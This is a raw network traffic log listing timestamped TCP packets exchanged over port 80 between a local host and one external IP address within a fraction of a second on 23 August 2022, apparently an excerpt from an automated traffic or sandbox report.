Aug 23, 2022 18:23:57.769934893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769944906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769988060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769989967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770037889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770046949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770090103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770095110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770143032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770147085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770199060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770199060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770246983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770253897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770298958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770303965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770349026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770355940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770401955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770406961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770453930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770458937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770503998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.770519018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.770559072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.772262096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.772357941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.777053118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.777091980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.777112961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.777134895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.777165890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.777182102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.777196884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.777206898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.777216911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.777245045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.777268887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.778928995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.778953075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.779025078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.779062033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.779767036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.779793024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.779849052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.779864073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.779887915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.779939890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.779947996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.779980898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.779994011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780025959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780041933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780072927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780095100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780103922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780116081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780131102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780148983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780159950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780170918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780186892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780205965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780215025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780230045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780242920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.780257940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.780291080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.781208992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.781243086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.781266928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.781289101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.783672094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.783776045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.783929110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.783977985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.783994913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784015894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784032106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784051895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784066916 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784109116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784116983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784171104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784178972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784210920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784244061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784246922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784265995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784286022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784301996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784337044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784377098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784430981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784460068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784492016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784511089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784543037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784550905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784581900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784607887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784634113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784661055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784718037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784723043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784754992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784770012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784790993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784821987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784826040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784841061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784862995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784879923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784900904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.784914970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.784946918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.785315990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.785391092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.790314913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.790365934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.790411949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.790429115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.790443897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.790476084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.790504932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.790510893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.793661118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.793756962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.793787956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.793844938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.793853998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.793921947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.793953896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794003963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794028044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.794068098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794116974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794176102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794234991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.794239044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794250011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.794259071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.794301987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794312000 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.794321060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.794347048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.794378042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.794421911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.795277119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.795373917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.795444965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.795469999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796139956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796227932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796237946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796327114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796365023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796488047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796489954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796550989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796561956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796612978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796633959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796677113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796698093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796745062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.796750069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.796817064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.797918081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.797957897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.797977924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.798042059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.798108101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.805819988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.805850029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.805875063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.805891991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.805946112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.805980921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.807699919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.807729006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.807754040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.807770014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.807795048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.807816029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.807845116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.807872057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.807919025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808002949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808052063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808074951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808094025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808114052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808123112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808156013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808182001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808186054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808223963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808237076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808239937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808265924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808279037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808284044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808303118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808327913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808343887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808873892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808892012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808913946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808943033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.808959007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.808959961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.809004068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.809010983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.809048891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.809334040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.809395075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.809819937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.809845924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.809861898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.809870958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.809933901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.809957027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810003996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810024023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810031891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810041904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810070038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810100079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810102940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810144901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810148954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810185909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810200930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810214996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810229063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810256958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810313940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810359955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810364962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810410023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810441017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810458899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810487032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810502052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810672045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810714960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810719967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810770035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810837030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810854912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810875893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810883999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810895920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810909033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810919046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810923100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810934067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.810957909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810965061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810981035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.810983896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.811028004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.811069965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.811093092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.811108112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.811122894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.811137915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.811158895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.812233925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.812268972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.812359095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.813604116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.813631058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.813677073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.813725948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.814958096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815058947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815135956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815167904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815193892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815236092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815258026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815269947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815274000 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815285921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815433025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815459967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815490961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815522909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815545082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815556049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815565109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815570116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815591097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815596104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815603018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815619946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815675020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.815680981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815685987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.815726042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.817404032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.817431927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.817452908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.817481041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.817501068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.818834066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.818867922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.818908930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.818922043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.818943977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.818969011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.818994999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819041014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819046021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819106102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819262028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819293022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819317102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819329023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819343090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819360018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819443941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819470882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819509029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819583893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819610119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819627047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819647074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819652081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819701910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819755077 CEST	49827	80	192.168.2.3	45.95.11.158
